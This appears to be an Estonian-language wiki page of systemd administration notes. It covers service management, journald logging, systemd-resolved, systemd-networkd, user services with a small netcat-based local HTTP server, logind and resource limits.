Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
